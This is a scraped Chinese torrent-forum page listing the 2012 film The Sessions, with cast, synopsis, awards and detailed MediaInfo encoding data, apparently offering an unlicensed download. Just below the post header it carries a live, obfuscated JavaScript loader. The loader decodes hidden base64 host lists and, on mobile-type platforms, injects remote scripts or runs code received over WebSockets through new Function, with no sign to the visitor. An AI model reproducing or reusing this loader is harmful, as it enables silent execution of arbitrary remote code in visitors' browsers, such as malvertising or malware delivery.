亲密治疗[繁体字幕].The.Sessions.2012.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 4.92GB

版主小s 2月前 877

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 亲密治疗 / Six Sessions / The Surrogate / 代理人 / 六次亲密接触 / 圣手回春(港) / 性福疗程(台) / 破处

◎片 名 The Sessions

◎年 代 2012

◎产 地 美国

◎类 别 剧情

◎语 言 英语

◎上映日期 2012-01-23(圣丹斯电影节) / 2012-10-26(美国)

◎IMDb评分 7.2/10 from 41123 users

◎IMDb链接 https://www.imdb.com/title/tt1866249

◎豆瓣评分 7.5/10 from 11569 users

◎豆瓣链接 https://movie.douban.com/subject/6875420/

◎片 长 95分钟

◎导 演 本·列文 Ben Lewin

◎编 剧 本·列文 Ben Lewin

◎主 演 约翰·浩克斯 John Hawkes

海伦·亨特 Helen Hunt

穆恩·布拉得古德 Moon Bloodgood

威廉姆·H·梅西 William H. Macy

W·厄尔·布朗 W. Earl Brown

罗明 Ming Lo

Jarrod Bailey

詹姆斯·马丁内斯 James Martinez

J. Teddy Garces

Gina-Raye Carter

Stephane Nicoli

布蕾克·林斯利 Blake Lindsley

雷亚·普尔曼 Rhea Perlman

拉丝蒂·休默 Rusty Schwimmer

亚当·阿金 Adam Arkin

罗宾·薇格特 Robin Weigert

安尼卡·马克斯 Annika Marks

◎标 签 美国 | 人性 | 剧情 | 伦理 | 爱情 | 2012 | 美国电影 | HelenHunt

◎简 介

马克·欧布莱恩(约翰·浩克斯 John Hawkes 饰)曾在幼年时期患上过小儿麻痹症。疾病的后遗症不仅让他再也没有站起来过,并且还让他饱受呼吸困难的折磨。虽然已过而立之年的他早已成为一名成功的诗人兼记者,但作为一个男人,却从未尝试过性的滋味。在向牧师朋友多次寻求指引 后,他毅然决定通过雇佣专业性从业者来帮助自己完成这个愿望。于是谢尔(海伦·亨特 Helen Hunt 饰)出现在了马克的生活里。然而对于马克这样特殊的情况,谢尔一开始也觉得无所适从。但是渐渐地,两人不仅从医患关系变为朋友,谢尔同时也给予了马克追求幸福和爱的勇气,让马克迈出了追寻爱的第一步。本片根据真人真事改编。片中谢尔的扮演者海伦·亨特获得第85届奥斯卡最佳女配角等多项电影节提名。

◎获奖情况

第85届奥斯卡金像奖(2013)

最佳女配角(提名) 海伦·亨特

第70届金球奖(2013)

电影类 剧情片最佳男主角(提名) 约翰·浩克斯

电影类 最佳女配角(提名) 海伦·亨特

第19届美国演员工会奖(2013)

电影奖 最佳男主角(提名) 约翰·浩克斯

电影奖 最佳女配角(提名) 海伦·亨特

第18届美国评论家选择电影奖(2013)

最佳男主角(提名) 约翰·浩克斯

最佳女配角(提名) 海伦·亨特

第28届美国独立精神奖(2013)

最佳男主角 约翰·浩克斯

最佳女配角 海伦·亨特

第17届金卫星奖(2012)

电影部门 最佳剧情片(提名)

电影部门 最佳导演(提名) 本·列文

电影部门 剧情片最佳男主角(提名) 约翰·浩克斯

电影部门 最佳女配角(提名) 海伦·亨特

电影部门 最佳改编剧本(提名) 本·列文

电影部门 最佳剪辑(提名) Lisa Bromwell

第11届华盛顿影评人协会奖(2012)

最佳男主角(提名) 约翰·浩克斯

最佳女配角(提名) 海伦·亨特

第17届圣地亚哥影评人协会奖(2012)

最佳女主角(提名) 海伦·亨特

最佳男主角(提名) 约翰·浩克斯

第25届芝加哥影评人协会奖(2012)

最佳男主角(提名) 约翰·浩克斯

最佳女主角(提名) 海伦·亨特

第11届旧金山影评人协会奖(2012)

最佳女配角 海伦·亨特

第12届凤凰城影评人协会奖(2012)

最佳男主角(提名) 约翰·浩克斯

最佳女配角(提名) 海伦·亨特

  1. General

  2. Unique ID : 136089548154261148152697233320557115170 (0x6661E4C25E927E4AAAA886669A3F7722)

  3. Complete name : The.Sessions.2012.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 4.92 GiB

  7. Duration : 1 h 35 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 7 400 kb/s

  10. Encoded date : UTC 2021-07-04 10:35:52

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 34 min

  20. Bit rate : 4 249 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 038 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.089

  30. Stream size : 2.82 GiB (57%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 4249 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1038 / interlace=0 / total-frames=136634 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 35 min

  48. Bit rate mode : Variable

  49. Bit rate : 3 068 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 2.04 GiB (41%)

  57. Title : English DTS-HD Master Audio 5.1 @ 3065 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Text #1

  62. ID : 3

  63. Format : PGS

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 29 min

  67. Bit rate : 38.0 kb/s

  68. Count of elements : 2598

  69. Stream size : 24.2 MiB (0%)

  70. Title : Eng/SUP

  71. Language : English

  72. Default : No

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 34 min

  80. Bit rate : 22.9 kb/s

  81. Count of elements : 2406

  82. Stream size : 15.5 MiB (0%)

  83. Title : Cht/SUP 原盘繁体(HK)

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Text #3

  88. ID : 5

  89. Format : PGS

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 34 min

  93. Bit rate : 26.0 kb/s

  94. Count of elements : 2374

  95. Stream size : 17.5 MiB (0%)

  96. Title : Cht/SUP 原盘繁体(TW)

  97. Language : Chinese

  98. Default : Yes

  99. Forced : No


  100. Menu

  101. 00:00:00.000 : en:第 01 章

  102. 00:03:45.225 : en:第 02 章

  103. 00:08:18.373 : en:第 03 章

  104. 00:13:29.017 : en:第 04 章

  105. 00:17:04.982 : en:第 05 章

  106. 00:19:21.243 : en:第 06 章

  107. 00:23:21.233 : en:第 07 章

  108. 00:27:56.508 : en:第 08 章

  109. 00:33:08.486 : en:第 09 章

  110. 00:37:57.400 : en:第 10 章

  111. 00:41:44.210 : en:第 11 章

  112. 00:45:08.748 : en:第 12 章

  113. 00:50:01.165 : en:第 13 章

  114. 00:53:56.859 : en:第 14 章

  115. 00:55:28.617 : en:第 15 章

  116. 01:00:20.909 : en:第 16 章

  117. 01:03:12.580 : en:第 17 章

  118. 01:06:56.471 : en:第 18 章

  119. 01:09:34.754 : en:第 19 章

  120. 01:10:26.597 : en:第 20 章

  121. 01:13:15.975 : en:第 21 章

  122. 01:21:01.273 : en:第 22 章

  123. 01:27:06.304 : en:第 23 章

  124. 01:30:39.643 : en:第 24 章


此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回